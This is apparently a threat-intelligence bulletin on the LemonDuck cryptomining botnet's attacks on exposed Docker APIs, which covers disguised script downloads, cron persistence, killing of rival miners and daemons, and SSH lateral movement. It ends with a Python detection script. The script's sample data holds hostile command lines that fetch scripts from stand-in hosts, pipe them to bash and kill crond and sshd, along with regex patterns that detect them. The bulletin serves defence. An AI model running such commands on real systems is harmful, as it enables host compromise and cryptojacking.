2022-04-26

Docker Targeted by LemonDuck

Industry: N/A | Level: Tactical | Source: CrowdStrike

Intelligence from CrowdStrike tracked operations of the cryptomining botnet LemonDuck targeting Docker. A unique aspect of the campaign is the use of proxy pools to hide the attackers' wallet address: "Proxy pools help in hiding the actual crypto wallet address where the contributions are made by current mining activity." LemonDuck initially gained access by compromising exposed Docker APIs. Once inside, a custom Docker ENTRYPOINT is used to set executables that always run when the container starts, in order to download a bash script that masquerades as a PNG file. The script sets a cron job and downloads an additional bash file disguised as "a.asp," which is the true payload of the attack. Before starting the mining operation, the script terminates processes, network connections and/or indicators that could belong to rival cryptominers, and also kills the crond, sshd and syslog daemons. LemonDuck operators are also capable of disabling Alibaba's cloud monitoring service. The mining setup completes with the download of XMRig. Lateral movement is carried out over SSH: after locating SSH keys, the attackers log into other servers and continue to deploy their scripts.

  • Anvilogic Scenario: LemonDuck Cryptomining Campaign with initial Bash Script
  • Anvilogic Use Cases:
      • Publicly exposed Docker API
      • Rare shell script execution
      • Crontab Job Scheduling (Unix)
      • File Download (Unix)
      • Locate Credentials
      • Service Stop Commands
      • SSH Pivoting
      • Multiple SSH Logins Across Different Machines
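As an added example (not code from CrowdStrike or Anvilogic), the following Python triage pass scores captured Docker Engine API container-create request bodies for the traits described above and in the use cases: a downloader in the entrypoint, a script fetched under an image or .asp extension, output piped into a shell, and termination of crond, sshd or syslog. The request bodies, image names and addresses are constructed for illustration and the field names follow the Docker API's Entrypoint/Cmd/Image keys.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed sample bodies, as a reverse proxy or audit hook in front of the
# Docker daemon might capture them for POST /containers/create (illustrative only).
SAMPLE_EVENTS = [
    '{"Image": "alpine", "Entrypoint": ["/bin/sh", "-c", "wget -qO- http://203.0.113.10/core.png | bash"]}',
    '{"Image": "nginx:1.25", "Entrypoint": ["nginx", "-g", "daemon off;"]}',
    '{"Image": "ubuntu", "Cmd": ["bash", "-c", "pkill crond; pkill sshd; curl -s http://198.51.100.5/a.asp -o /tmp/a; sh /tmp/a"]}',
]

# Heuristics matching the behaviours in the write-up; tune to your environment.
DOWNLOADER = re.compile(r"\b(curl|wget)\b[^|;&]*https?://\S+")
DISGUISED = re.compile(r"https?://\S+\.(png|jpg|jpeg|gif|asp)\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
DAEMON_KILL = re.compile(
    r"\b(pkill|killall|systemctl\s+stop|service\s+\S+\s+stop)\b[^;&|]*\b(crond?|sshd|r?syslogd?)\b"
)


def _as_text(value) -> str:
    """Entrypoint/Cmd may be a list or a single string in the Docker API."""
    if value is None:
        return ""
    return " ".join(value) if isinstance(value, list) else str(value)


def score(body: Dict) -> List[str]:
    """Return the list of suspicious traits found in one container-create body."""
    cmd = _as_text(body.get("Entrypoint")) + " " + _as_text(body.get("Cmd"))
    hits = []
    if DOWNLOADER.search(cmd):
        hits.append("downloader_in_command")
    if DISGUISED.search(cmd):
        hits.append("script_disguised_as_image")
    if PIPE_TO_SHELL.search(cmd):
        hits.append("pipe_to_shell")
    if DAEMON_KILL.search(cmd):
        hits.append("kills_daemon")
    return hits


def triage(raw_lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Parse each captured JSON body and return (image, traits) for flagged ones."""
    flagged = []
    for raw in raw_lines:
        try:
            body = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed capture: skip rather than abort the whole batch
        hits = score(body)
        if hits:
            flagged.append((body.get("Image", "?"), hits))
    return flagged


if __name__ == "__main__":
    for image, traits in triage(SAMPLE_EVENTS):
        print(f"ALERT image={image} traits={','.join(traits)}")
```

Two or more traits on one create request is a strong signal of the container-based loader described above; a single downloader hit on its own is common in legitimate build images and should be scoped to hosts with an exposed daemon.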
